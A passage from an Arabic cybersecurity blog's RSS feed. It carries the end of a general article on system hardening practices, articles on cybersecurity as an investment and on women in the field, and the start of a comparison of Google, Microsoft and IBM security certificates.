&lt;p&gt;توقف عن تخيل هذه الأمور السيئة، نحن هنا لمساعدتك ولن نسمح بالأمور لأن تصل لهذه المرحلة ولكن هذا الأمر يتطلب منك تخصيص بعض الوقت لتطبيق إجراءات الحماية الاستباقية لتجنب أو على الأقل للتقليل من احتمالية تعرضك للهجمات السيبرانية، &lt;strong&gt;إليك أفضل الممارسات والإجراءات الأمنية:&lt;/strong&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;GOOD HARDENING AVOID YOU BAD INCIDENTS&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;أفضل-الممارسات-والإجراءات-الأمنية&quot;&gt;أفضل الممارسات والإجراءات الأمنية&lt;/h2&gt;
&lt;h3 id=&quot;1-تثبيت-التحديثات-الأمنية-بانتظام&quot;&gt;1. تثبيت التحديثات الأمنية بانتظام&lt;/h3&gt;
&lt;p&gt;الشركات المصنعة للأنظمة الإلكترونية تصدر بانتظام تحديثات لمعالجة الثغرات الأمنية المعروفة، تعتبر عملية تثبيت هذه التحديثات بشكل منتظم وبأسرع وقت ممكن أحد أهم إجراءات تشديد الحماية للأنظمة الإلكترونية.&lt;/p&gt;
&lt;h3 id=&quot;2-تقييد-امتيازات-وصلاحيات-المستخدمين&quot;&gt;2. تقييد امتيازات وصلاحيات المستخدمين&lt;/h3&gt;
&lt;p&gt;يجب منح المستخدمين فقط الامتيازات ومستوى الصلاحيات التي يحتاجونها لأداء وظائفهم ويساعد هذا الأمر على تقليل سطح الهجوم وفي حال تم اختراق أحد الموظفين يصبح من الصعب على المهاجمين استغلال امتيازات المستخدم للوصول إلى البيانات أو الموارد غير المصرح بها.&lt;/p&gt;
&lt;h3 id=&quot;3-تعطيل-الخدمات-غير-الضرورية&quot;&gt;3. تعطيل الخدمات غير الضرورية&lt;/h3&gt;
&lt;p&gt;الخدمات غير الضرورية يمكن ان تشكل نقاط دخول إضافية للمهاجمين ولذلك يجب تعطيل أي خدمات غير مستخدمة على النظام، وبالأخص البرامج نادرة الاستخدام وهذا الأمر يساعد أيضاً في تقليل سطح الهجوم وتحسين أداء النظام وتوفير الطاقة والحفاظ على بياناتك بشكل آمن.&lt;/p&gt;
&lt;h3 id=&quot;4-استخدام-أنظمة-وتقنيات-الحماية&quot;&gt;4. استخدام أنظمة وتقنيات الحماية&lt;/h3&gt;
&lt;p&gt;استخدام أنظمة وتقنيات الحماية مثل الجدران النارية Firewalls والتي تساعد على منع الوصول غير المصرح به إلى النظام, يجب إعداد جدار الحماية بشكل صحيح لمنع جميع الاتصالات غير المصرح بها على جميع الأنظمة ومصادر الشبكة.&lt;/p&gt;
&lt;h3 id=&quot;5-استخدام-تقنيات-التحكم-في-الوصول-access-control&quot;&gt;5. استخدام تقنيات التحكم في الوصول (Access Control)&lt;/h3&gt;
&lt;p&gt;تقنيات التحكم في الوصول هي مجموعة من الإجراءات والسياسات التي تحدد من يمكنه الوصول إلى الموارد وتشمل هذه التقنيات قوائم التحكم في الوصول (ACLs) وقوائم التحكم الإلزامية (MACLs).&lt;/p&gt;
&lt;h3 id=&quot;6-تشفير-البيانات-الحساسة&quot;&gt;6. تشفير البيانات الحساسة&lt;/h3&gt;
&lt;p&gt;تشفير البيانات يساعد على الحماية من الوصول غير المصرح به، حيث يتم تحويل البيانات إلى شكل غير قابل للقراءة إلا باستخدام مفتاح فك التشفير الصحيح ويجب تشفير جميع البيانات الحساسة، مثل كلمات المرور والمعلومات المالية.&lt;/p&gt;
&lt;h3 id=&quot;7-تثبيت-مضاد-الفيروسات-وبرامج-الحماية-من-البرامج-الخبيثة&quot;&gt;7. تثبيت مضاد الفيروسات وبرامج الحماية من البرامج الخبيثة&lt;/h3&gt;
&lt;p&gt;برامج مكافحة الفيروسات تساعد على اكتشاف ومنع وإزالة البرامج الضارة والخبيثة مثل الفيروسات وبرامج التجسس وبرامج الفدية واستخدامها يعتبر أمر ضروري ولكنه غير كافي، العديد من البرمجيات الخبيثة الجديدة تمتلك تقنيات للتخفي وتجاوز الحماية المطبقة من قبل أنظمة الحماية.&lt;/p&gt;
&lt;h3 id=&quot;8-القيام-بعملية-النسخ-الاحتياطي-بشكل-منتظم&quot;&gt;8. القيام بعملية النسخ الاحتياطي بشكل منتظم&lt;/h3&gt;
&lt;p&gt;وجود نسخ احتياطية حديثة يعتبر أمر مهم جداً للتعافي من هجوم إلكتروني والتأكد من استعادة النظام لحالته السابقة وهنا تجد الإشارة لضرورة عدم حفظ النسخ الاحتياطية على نفس السيرفر والتأكد من وجود النسخ في أماكن أخرى آمنة ويمكن الوصول لها بشكل سريع وقت الحاجة.&lt;/p&gt;
&lt;h3 id=&quot;9-مراقبة-النظام&quot;&gt;9. مراقبة النظام&lt;/h3&gt;
&lt;p&gt;حيث يجب مراقبة النظام بشكل مستمر بحثاً عن أي نشاط مشبوه، تعتبر هذه العملية أمر مهم جداً لاكتشاف أي نشاط مشبوه واتخاذ الإجراءات المطلوبة بأسرع وقت ممكن.&lt;/p&gt;
&lt;h3 id=&quot;10-توعية-المستخدمين&quot;&gt;10. توعية المستخدمين&lt;/h3&gt;
&lt;p&gt;مهما بلغت قوة أنظمة وتقنيات الحماية التي تستخدمها يبقى العنصر البشري هو أكبر ثغرة بكل نظام، عندما يفشل المهاجم بتجاوز الحماية المطبقة يلجىء للقيام بهجمات الهندسة الاجتماعية من خلال استهداف الموظفين بطرق ذكية ومخادعة ليتمكن من اختراقهم والوصول لأجهزتهم أو معلوماتهم الحساسة ولهذا السبب تعتبر عملية توعية وتدريب الموظفين أمراً مهم جداً وتجد الإشارة أن هذه العملية يجب أن تتم بشكل دوري مع شرح لأحدث توجهات وأساليب المهاجمين ليمكن الموظفون من اكتشاف مثل هذا النوع من الهجمات وتجنب الوقوع كضحايا لها.&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;يجب على المنظمات والشركات أن تعمل على تقييم احتياجاتها الأمنية الخاصة وتنفيذ ممارسات تشديد الحماية المناسبة لها لضمان مستوى الحماية المطلوب وضمان استمرارية الأعمال.&lt;/p&gt;
&lt;p&gt;عملية تشديد الحماية للأنظمة الإلكترونية Cybersecurity Hardening هي عملية مستمرة وتتطلب التحديث والتكيف مع التهديدات الإلكترونية المتطورة وهي الخطوة الأولى في أي برنامج حماية لضمان حماية البيانات والمعلومات من التهديدات الإلكترونية المتزايدة.&lt;/p&gt;
&lt;p&gt;اتمنى لكم الأمن والسلامة في حياتكم الرقمية وإن كان لديكم أي استفسارات أو تعليقات حول هذا الموضوع، فلا تترددوا بالتواصل معي عبر &lt;a href=&quot;https://t.me/Ramishraif&quot;&gt;التلغرام&lt;/a&gt; سأكون سعيد جداً بالرد على أي استفسار أو تعليق حول هذا الموضوع ولتبقوا على إطلاع دائم بكل ما هو جديد في عالم الأمن السيبراني، انصحكم بمتابعة صفحة &lt;a href=&quot;https://facebook.com/jameeltawelh&quot;&gt;المهندس جميل حسين طويلة&lt;/a&gt; على الفيسبوك.&lt;/p&gt;
</content:encoded><category>الأمن السيبراني</category><category>Hardening</category><category>تشديد الحماية</category><category>سطح الهجوم</category><category>Network hardening</category><category>Servers hardening</category><category>Cloud hardening</category></item><item><title>الأمن السيبراني: استثمار لحماية المستقبل</title><link>https://blog.cyberpedia.site/cybersecurity-investment-to-protect-the-future/</link><guid isPermaLink="true">https://blog.cyberpedia.site/cybersecurity-investment-to-protect-the-future/</guid><description>لماذا أصبح الأمن السيبراني ضرورة لا رفاهية للأفراد والشركات والدول، وكيف يحمي قطاعات الصناعة والتجارة والتعليم والصحة والبنوك والطاقة والنقل والاتصالات.</description><pubDate>Tue, 02 Apr 2024 12:13:14 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;الأمن السيبراني اليوم ضرورة وليس رفاهية، بسبب تزايد التهديدات الرقمية وأهمية البيانات وتطور أساليب الهجوم وتشديد قوانين حماية البيانات. وهو مستخدم في كل جوانب الحياة، من الصناعة والتجارة الإلكترونية والتعليم والرعاية الصحية إلى البنوك والطاقة والنقل والاتصالات، لذلك يعد أفضل استثمار للمستقبل.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;في عصر التكنولوجيا الحديثة والتطور السريع لشبكة الإنترنت، أصبحت الهجمات السيبرانية مصدر تهديد للمعلومات والبيانات الحساسة للأفراد والمؤسسات والدول على حد سواء.&lt;/p&gt;
&lt;p&gt;يعتبر مجال &lt;a href=&quot;https://blog.cyberpedia.site/what-is-cyber-security/&quot;&gt;الأمن السيبراني&lt;/a&gt; من أهم القضايا التي تشغل بال العديد من الأفراد والمؤسسات والشركات في جميع أنحاء العالم، يسعى خبراء الأمن السيبراني باستمرار إلى تطوير استراتيجيات وتقنيات متقدمة للوقاية من الهجمات الإلكترونية وحماية البيانات الحساسة؛ في هذا السياق تعتبر التوعية بأهمية الأمن السيبراني وتبني الممارسات الآمنة على الإنترنت ضرورة ملحة لضمان سلامة المعلومات والحفاظ على خصوصية الأفراد والمؤسسات في عصر رقمي متصل بشكل لا يسبق له مثيل.&lt;/p&gt;
&lt;p&gt;في هذا المقال سنسلط الضوء على الأمن السيبراني كاستثمار لحماية المستقبل.&lt;/p&gt;
&lt;p&gt;في البداية لنقم بالإجابة على السؤال التالي:&lt;/p&gt;
&lt;h2 id=&quot;لماذا-الأمن-السيبراني&quot;&gt;لماذا الأمن السيبراني؟&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;في البداية دعنا نتفق حول هذه الحقيقة:&lt;/p&gt;
&lt;p&gt;“الأمن السيبراني في يومنا الحالي هو ضرورة وليس رفاهية”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;هذا الأمر على كل المستويات، على مستوى الأفراد لحماية المعلومات الشخصية وحماية الهوية الرقمية وعلى مستوى الشركات لضمان استمراية الأعمال وحماية بيانات العملاء وحتى على مستوى الدول فقد أصبح الأمن السيبراني مرتبطاً بالأمن القومي للدول.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;هذا الأمر مرتبط بعدة أسباب ومنها:&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id=&quot;تزايد-التهديدات-الرقمية&quot;&gt;تزايد التهديدات الرقمية&lt;/h3&gt;
&lt;p&gt;مع تطور التكنولوجيا وانتشار استخدام الإنترنت والأجهزة الذكية، زادت التهديدات الأمنية الرقمية بشكل كبير وبالتالي، أصبح من الضروري تطوير وتعزيز قدرات الأمن السيبراني لحماية البيانات والأنظمة الحيوية.&lt;/p&gt;
&lt;h3 id=&quot;أهمية-البيانات-والمعلومات&quot;&gt;أهمية البيانات والمعلومات&lt;/h3&gt;
&lt;p&gt;في عصرنا الحالي، تعتبر البيانات والمعلومات من أهم الموارد في مختلف القطاعات، بما في ذلك القطاع الصحي والمالي والحكومي ولهذا السبب يجب حماية هذه البيانات من التسريبات وعمليات الاختراق.&lt;/p&gt;
&lt;h3 id=&quot;تطور-تقنيات-وأساليب-الهجوم&quot;&gt;تطور تقنيات وأساليب الهجوم&lt;/h3&gt;
&lt;p&gt;مع تطور التكنلوجيا أصبحت الهجمات السيبرانية أكثر تطوراً وزادت صعوبة اكتشافها والتقليل من آثارها ولهذا السبب يتطلب مجال الأمن السيبراني استخدام تقنيات متقدمة وابتكارية لمواجهة هذه التهديدات.&lt;/p&gt;
&lt;h3 id=&quot;تأثير-الهجمات-السيبرانية&quot;&gt;تأثير الهجمات السيبرانية&lt;/h3&gt;
&lt;p&gt;تظهر تأثيرات الهجمات السيبرانية على المؤسسات والأفراد بشكل متزايد، مثل فقدان البيانات والتوقف عن العمل والخسائر المالية ولهذا السبب يجب تعزيز قدرات الأمن السيبراني للوقاية من هذه التأثيرات.&lt;/p&gt;
&lt;h3 id=&quot;التشريعات-والتنظيمات&quot;&gt;التشريعات والتنظيمات&lt;/h3&gt;
&lt;p&gt;يزداد اهتمام الحكومات والجهات التنظيمية بتشديد قوانين ولوائح حماية البيانات والخصوصية، مما يضع المزيد من التحديات أمام المؤسسات لتحقيق الامتثال وضمان سلامة وخصوصية بيانات العملاء.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;لننتقل لحقيقة أخرى وهي:&lt;/p&gt;
&lt;p&gt;“الأمن السيبراني مستخدم في كل جوانب وتفاصيل حياتنا اليومية”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;إليك-بعض-أهم-المجالات-التي-تعتمد-في-يومنا-الحالي-على-الأمن-السيبراني&quot;&gt;إليك بعض أهم المجالات التي تعتمد في يومنا الحالي على الأمن السيبراني&lt;/h2&gt;
&lt;h3 id=&quot;الصناعة&quot;&gt;الصناعة&lt;/h3&gt;
&lt;p&gt;يمكن استخدام تقنيات الأمن السيبراني في قطاع الصناعة لحماية أنظمة التحكم الصناعية والبيانات الحساسة المتعلقة بعمليات الإنتاج. يساعد الأمن السيبراني في تقليل مخاطر التعرض للاختراقات والتلاعب بالبيانات.&lt;/p&gt;
&lt;h3 id=&quot;التجارة-الإلكترونية&quot;&gt;التجارة الإلكترونية&lt;/h3&gt;
&lt;p&gt;يلعب الأمن السيبراني دوراً حيوياً في حماية المعلومات الشخصية والبنكية للمستخدمين عبر منصات التجارة الإلكترونية ويساعد في تأمين عمليات الدفع عبر الإنترنت وضمان سلامة المعاملات التجارية.&lt;/p&gt;
&lt;h3 id=&quot;التعليم&quot;&gt;التعليم&lt;/h3&gt;
&lt;p&gt;يمكن استخدام الأمن السيبراني في قطاع التعليم لحماية بيانات الطلاب والأساتذة وضمان سلامة التواصل والتعلم عبر الشبكة، كما يساهم في حماية الموارد التعليمية وضمان استمرارية عملية التعليم عن بُعد.&lt;/p&gt;
&lt;h3 id=&quot;الرعاية-الصحية&quot;&gt;الرعاية الصحية&lt;/h3&gt;
&lt;p&gt;يلعب الأمن السيبراني دوراً حاسماً في قطاع الرعاية الصحية لحماية بيانات المرضى والتاريخ الطبي وضمان سرية المعلومات الطبية ويحافظ على سلامة نظام المعلومات الصحية ويقلل من خطر التهديدات السيبرانية.&lt;/p&gt;
&lt;h3 id=&quot;الحكومة&quot;&gt;الحكومة&lt;/h3&gt;
&lt;p&gt;تستخدم الحكومات تقنيات الأمن السيبراني لحماية بياناتها الحساسة وضمان سلامة أنظمتها وتشغيلها وتساهم استراتيجيات الأمن السيبراني في تقوية قدرة الحكومات على مواجهة التهديدات الإلكترونية والتجسس.&lt;/p&gt;
&lt;h3 id=&quot;البنوك-والمؤسسات-المالية&quot;&gt;البنوك والمؤسسات المالية&lt;/h3&gt;
&lt;p&gt;يعتبر الأمن السيبراني أمر حيوي في قطاع البنوك والمؤسسات المالية لحماية بيانات العملاء والمعاملات المالية الحساسة ويساعد في تأمين عمليات الدفع والتحويلات الإلكترونية والتعامل مع التهديدات المتزايدة للجرائم المالية عبر الإنترنت.&lt;/p&gt;
&lt;h3 id=&quot;الشركات-والمؤسسات&quot;&gt;الشركات والمؤسسات&lt;/h3&gt;
&lt;p&gt;يستخدم القطاع الخاص تقنيات الأمن السيبراني لحماية بياناته التجارية والملكية الفكرية وضمان سلامة الاتصالات والتعاملات داخل المؤسسة ويحافظ على سرية المعلومات التجارية ويقلل من خطر التسريبات التي تؤثر على سمعة الشركة.&lt;/p&gt;
&lt;h3 id=&quot;الطاقة-والبنية-التحتية&quot;&gt;الطاقة والبنية التحتية&lt;/h3&gt;
&lt;p&gt;يستخدم قطاع الطاقة والبنية التحتية تقنيات الأمن السيبراني لحماية الأنظمة من التهديدات السيبرانية التي يمكن أن تؤثر على استقرار البنية التحتية وتقليل كفاءة الخدمات ويساهم في تأمين شبكات الطاقة والاتصالات وضمان استمرارية التشغيل.&lt;/p&gt;
&lt;h3 id=&quot;قطاع-النقل&quot;&gt;قطاع النقل&lt;/h3&gt;
&lt;p&gt;يستخدم قطاع النقل تقنيات الأمن السيبراني لحماية أنظمته المتصلة بالإنترنت، مثل أنظمة الملاحة والتحكم في المرور والأجهزة المتصلة بالشبكة ويضمن سلامة عمليات النقل ويقلل من خطر التدخل غيرالمصرح به.&lt;/p&gt;
&lt;h3 id=&quot;قطاع-الاتصالات&quot;&gt;قطاع الاتصالات&lt;/h3&gt;
&lt;p&gt;يلعب الأمن السيبراني دور أساسي في قطاع الاتصالات لحماية بيانات المشتركين وضمان سلامة شبكات الاتصالات وخدماتها ويسهم في تأمين التواصل وتقديم خدمات اتصال موثوقة وآمنة.&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;لكل هذه الأسباب يجب أن &lt;a href=&quot;https://blog.cyberpedia.site/how-to-start-in-cyber-security/&quot;&gt;تبدأ الآن في مجال الأمن السيبراني&lt;/a&gt; كون هذا المجال يعتبر أفضل استثمار للمستقبل ولتبدأ بهذا المجال بشكل احترافي انصحك بالإطلاع على &lt;a href=&quot;https://books.cyberpedia.site/&quot;&gt;مكتبة الأمن السيبراني&lt;/a&gt; و&lt;a href=&quot;https://cyberpedia.site/&quot;&gt;موسوعة الأمن السيبراني&lt;/a&gt; ومتابعة صفحة &lt;a href=&quot;https://www.facebook.com/jameeltawelh&quot;&gt;المهندس جميل حسين طويلة&lt;/a&gt; على الفيسبوك.&lt;/p&gt;
</content:encoded><category>الأمن السيبراني</category><category>الأمن السيبراني</category><category>حماية البيانات</category><category>التهديدات السيبرانية</category><category>البنية التحتية</category></item><item><title>دور المرأة في مجال الأمن السيبراني</title><link>https://blog.cyberpedia.site/woman-in-cybersecurity/</link><guid isPermaLink="true">https://blog.cyberpedia.site/woman-in-cybersecurity/</guid><description>تجربة مهندسة اتصالات في دخول الأمن السيبراني، وكيف يمكن تعزيز دور المرأة فيه، مع ست خطوات عملية لتبدأ المرأة مسيرتها المهنية في هذا المجال.</description><pubDate>Wed, 17 Jan 2024 09:02:18 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;قلة مشاركة النساء في الأمن السيبراني تعني مساحة كبيرة للنمو والتميز وفرص عمل ممتازة لمن تستمر وتعمل بجد. لتبدأ المرأة مسيرتها: التعليم والتدريب، واكتساب الخبرة العملية، والحصول على شهادات مثل Security+ وCEH، وبناء شبكة مهنية، والتطوير المستمر، وتشجيع نساء أخريات على دخول المجال.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;تجسدت رغبتي الشديدة في الانضمام إلى مجال &lt;a href=&quot;https://blog.cyberpedia.site/what-is-cyber-security/&quot;&gt;الأمن السيبراني&lt;/a&gt;، كوني مهندسة اتصالات تبحث عن التميز بشكل دائم، بدأت رحلتي في هذا المجال في عام 2022 عند إلتحاقي بدورة “&lt;a href=&quot;https://cyberpedia.site/course/cyber-ops/&quot;&gt;Cyber Ops&lt;/a&gt;” لكني وجدت نفسي وحيدة مع فتاة واحدة فقط في هذه الدورة، كان معظم المتدربين من الشباب، كان لهذا الأمر تأثير سلبي على المتابعة ودراسة محتوى الدورة وبدأت إشارات الاستفهام تظهر لدي فيما إذا كان هذا المجال ليس مناسباً لنا نحن النساء.&lt;/p&gt;
&lt;p&gt;لكني قررت أن أسأل مدرب الدورة &lt;a href=&quot;https://www.facebook.com/jameeltawelh&quot;&gt;المهندس جميل حسين طويلة&lt;/a&gt; عن هذا الأمر.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;وأجابني بكلمات ملهمة قائلاً:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;“بالعكس تماماً! ستكون لديك فرصة رائعة في هذا المجال، لأن نسبة المشاركة للفتيات قليلة جداً، إذا استمريتِ وعملتِ بجد، فبالتأكيد ستجنين ثماراً رائعة وستحظى بفرص عمل ممتازة في المستقبل.”&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;بهذه الكلمات، تغيرت نظرتي تماماً وأدركت أن وجودي في هذا المجال كامرأة يمثل فرصة للتأثير والتميز وقررت أن استمر وأعمل بجد، لأنني أدركت أن قلة المشاركة النسائية تعني أن هناك مساحة كبيرة للنمو والتفوق.&lt;/p&gt;
&lt;h2 id=&quot;لماذا-قررت-كتابة-هذا-المقال&quot;&gt;لماذا قررت كتابة هذا المقال؟&lt;/h2&gt;
&lt;p&gt;لكي أشجع كل امرأة مهتمة بمجال الأمن السيبراني على أن تتجاوز الشكوك والتحديات وأن تؤمن بقدرتها على تحقيق النجاح، لا تدعي أي نسبة قليلة تثنيكي عن متابعة شغفك وتحقيق أهدافك فالعالم يحتاج إلى صوتك ومساهمتك في حماية وجودنا الرقمي.&lt;/p&gt;
&lt;p&gt;كما نعلم جميعاً بأن الأمن السيبراني أصبح تحدياً رئيسياً في عصرنا الحديث وبالتالي فإن دخول المرأة في هذا المجال المعقد والمتطور يمثل تحدياً للتصور التقليدي ومع ذلك، على الرغم من التحديات الكثيرة تثبت المرأة يوما بعد يوم قدرتها على تقديم إسهامات قيمة وحلول فريدة لتعزيز الحماية في عالمنا الرقمي وبالفعل، هناك نماذج مشرقة لنساء يعملن في هذا المجال، حيث يتفوقن في تحليل الهجمات السيبرانية وحماية الأنظمة والشبكات من عمليات الاختراق وسرقة وتسريب البيانات.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;وهنا يجب أن نتذكر:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;أن القدرة والموهبة لا تتوقف على جنس معين أو دور معين في المجتمع فلنرحب ولندعم ولنلهم المزيد من النساء للازدهار في مجال الأمن السيبراني!&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;كيف-يمكننا-تعزيز-دور-المرأة-في-هذا-المجال&quot;&gt;كيف يمكننا تعزيز دور المرأة في هذا المجال؟&lt;/h2&gt;
&lt;p&gt;بالتأكيد يوجد العديد من الأمور التي من الممكن أن تساعد في تعزيز دور المرأة في مجال الأمن السيبراني ومن وجهة نظري يمكن أن يتم هذا الأمر من خلال الدعم والتدريب المستمر للنساء اللاتي يسعين للدخول إلى هذا المجال عبر تقديم برامج تعليم وتدريب مخصصة وتوفر الفرص والموارد الضرورية للنمو والتقدم المهني، كما يمكن تشجيع المشاركة النشطة للشركات والمؤسسات في تأمين بيئة عمل تحترم التنوع وتقدر المساهمات المتنوعة.&lt;/p&gt;
&lt;h2 id=&quot;خطوات-لتبدأ-المرأة-مسيرتها-المهنية-في-الأمن-السيبراني&quot;&gt;خطوات لتبدأ المرأة مسيرتها المهنية في الأمن السيبراني&lt;/h2&gt;
&lt;p&gt;سأطرح عليكم بعض الخطوات لمساعدة المرأة المهتمة بمجال الأمن السيبراني لتبدأ مسيرتها المهنية:&lt;/p&gt;
&lt;h3 id=&quot;1-التعليم-والتدريب&quot;&gt;1. التعليم والتدريب&lt;/h3&gt;
&lt;p&gt;تبدأ المسيرة المهنية في مجال الأمن السيبراني بالتعليم والتدريب ولهذا السبب ينبغي على المرأة المهتمة أن تكتسب المعرفة والمهارات الأساسية في مجال الأمن السيبراني من خلال دراسة علوم الحاسب وأساسيات الشبكات وأنظمة التشغيل، يمكن الحصول على كل هذه المهارات من خلال حضور الدورات التدريبية والبرامج التعليمية المتاحة عبر الإنترنت أو في المراكز التدريبية.&lt;/p&gt;
&lt;h3 id=&quot;2-اكتساب-الخبرة-العملية&quot;&gt;2. اكتساب الخبرة العملية&lt;/h3&gt;
&lt;p&gt;بمجرد الحصول على المعرفة الأساسية، يوصى بالبحث عن فرص لاكتساب الخبرة العملية في مجال الأمن السيبراني. يمكن للمرأة الالتحاق ببرامج التدريب أو الاجتماعات والمؤتمرات المتخصصة والمشاركة في مشاريع تطوعية أو العمل في مشاريع جامعية ذات صلة، هذه الفرص تساعدها على تطبيق المفاهيم والمهارات التي تعلمتها وبناء شبكة مهنية.&lt;/p&gt;
&lt;h3 id=&quot;3-الحصول-على-الشهادات-والاعتمادات&quot;&gt;3. الحصول على الشهادات والاعتمادات&lt;/h3&gt;
&lt;p&gt;تعد الشهادات والاعتمادات في مجال الأمن السيبراني أداة هامة لبناء المصداقية والتميز المهني، هناك العديد من الشهادات المعترف بها عالمياً في مجال الأمن السيبراني، مثل شهادة Security Plus وشهادة Certified Ethical Hacker (CEH)، والعديد من &lt;a href=&quot;https://blog.cyberpedia.site/cyber-certificate-war/&quot;&gt;الشهادات الأخرى&lt;/a&gt; ينبغي على المرأة المهتمة أن تدرس وتحضر دورات الاستعداد لهذه الشهادات وتسعى للحصول عليها لتعزيز مهاراتها وتوسيع فرصها المهنية.&lt;/p&gt;
&lt;h3 id=&quot;4-بناء-الشبكة-المهنية&quot;&gt;4. بناء الشبكة المهنية&lt;/h3&gt;
&lt;p&gt;ينبغي على المرأة المهتمة بمجال الأمن السيبراني أن تبني شبكة مهنية قوية من خلال الانضمام إلى المنتديات و&lt;a href=&quot;https://www.wicys.org/&quot;&gt;المجتمعات&lt;/a&gt; عبر الإنترنت للتواصل مع المحترفين ومشاركة الأفكار والخبرات، كما ينصح بحضور المؤتمرات والمعارض الخاصة بالأمن السيبراني حيث يمكنها التعرف على أشخاص ذوي خبرة وتوسيع شبكتها المهنية.&lt;/p&gt;
&lt;h3 id=&quot;5-التقدم-المهني&quot;&gt;5. التقدم المهني&lt;/h3&gt;
&lt;p&gt;تتطلب مسيرة مهنية ناجحة بمجال الأمن السيبراني التقدم المستمر والتطوير المهني، ينبغي على المرأة المهتمة أن تواصل تعلم الأفكار والتقنيات الجديدة في هذا المجال بالإضافة لمتابعة التطورات والتحديثات الأمنية، هذه الأمور تساعدها للحصول على فرص للترقية والتحول إلى مناصب أعلى في مجال الأمن السيبراني، مثل مدير الأمن السيبراني أو مستشار الأمن السيبراني.&lt;/p&gt;
&lt;h3 id=&quot;6-تعزيز-الوعي-وتشجيع-النساء&quot;&gt;6. تعزيز الوعي وتشجيع النساء&lt;/h3&gt;
&lt;p&gt;يمكن للمرأة المهتمة بمجال الأمن السيبراني أن تلعب دوراً في تعزيز الوعي الأمني وتشجيع المزيد من النساء على اختيار هذا المجال المهني من خلال المشاركة في الأنشطة والمبادرات التعليمية وتقديم الدعم والمساعدة للنساء اللاتي يرغبن في دخول هذا المجال.&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;أوصيكِ بالاستمرار على هذا النهج والعمل بجد لاكتساب المهارات المطلوبة وتوسيع معرفتك في مجال الأمن السيبراني فرغم التحديات الكثيرة يمكن أن تكوني فتاة ناجحة ومبدعة في هذا المجال وقادرة على تحقيق تميزك وفرض بصمتك الخاصة، استمري في مسيرتك وتحدّي نفسك وكوني مستعدة للاستثمار بتعلم المهارات اللازمة لهذا المجال لضمان نجاحك في المستقبل.&lt;/p&gt;
&lt;p&gt;أنت تستحقين أن تُدرّبي وتعملي في هذا المجال بنفس الفرص والامتيازات التي يتمتع بها الأشخاص الآخرون، لذا أود أن أوجه رسالة لكل امرأة تهتم بمجال الأمن السيبراني: &lt;strong&gt;“لا تستسلمي للشكوك ولا تدعي نسبة المشاركة المنخفضة تثنيكِ عن متابعة شغفكِ وتحقيق أهدافكِ”.&lt;/strong&gt;&lt;/p&gt;
</content:encoded><category>المسار المهني والشهادات</category><category>المرأة في الأمن السيبراني</category><category>المسار المهني</category><category>الأمن السيبراني</category><category>شهادات الأمن السيبراني</category></item><item><title>حرب الشهادات السيبرانية</title><link>https://blog.cyberpedia.site/cyber-certificate-war/</link><guid isPermaLink="true">https://blog.cyberpedia.site/cyber-certificate-war/</guid><description>مقارنة بين ثلاث شهادات أمن سيبراني على كورسيرا: Google وMicrosoft وIBM، من حيث المدة والمحتوى والاختبار والتكلفة لاختيار الأنسب لك.</description><pubDate>Tue, 16 Jan 2024 10:31:54 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;يقارن المقال ثلاث شهادات أمن سيبراني على منصة كورسيرا: شهادة Google (6 أشهر) الأوسع للمبتدئين والطامحين لدور محلل أمني، وMicrosoft (6 أشهر) المركّزة على الحوسبة السحابية، وIBM (4 أشهر) القوية في الأساسيات. جميعها بسعر اشتراك موحد نحو 49 دولاراً شهرياً.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;رحلة مثيرة في عالم الحماية الرقمي وتحليل شيق لثلاث شهادات تعتبر من أهم الشهادات الأساسية في عالم الأمن السيبراني&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;في عالمنا المتقدم التكنولوجي اليوم، أصبحت الحاجة إلى الأمن السيبراني أمراً لا مفرَّ منه في عصر الابتكار التكنولوجي المتسارع، في يومنا الحالي لا غنى عن الأمن السيبراني لضمان حماية بياناتنا الحساسة وتحقيق الاستقرار الرقمي.&lt;/p&gt;
&lt;p&gt;تبرز الشهادات في مجال الأمن السيبراني كأدوات حيوية لتزويد المحترفين بالمهارات اللازمة لمواجهة التحديات المتزايدة في عالم الحماية الرقمي ومع تزايد الطلب على هذه الشهادات، يندلع سباق شرس بين مجموعة من الشهادات الرائدة، مما يثير التساؤلات حول الاختيار الأمثل.&lt;/p&gt;
&lt;p&gt;في هذا السياق المليء بالتحديات والفرص، تأتي هذه المقالة لتستكشف عوالم ثلاث شهادات سيبرانية محترمة، تتيح للمتعلمين فرصة تطوير مهاراتهم واكتساب المعرفة اللازمة.&lt;/p&gt;
&lt;p&gt;سنستعرض بعناية جوانب كل شهادة ونسلط الضوء على الفوارق الرئيسية بينها، مما يساعدك في اتخاذ قرار مستنير حول الشهادة التي تتناسب أكثر مع احتياجاتك وأهدافك المهنية.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;سنستعرض معاً مسارات هذه الشهادات الثلاثة:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
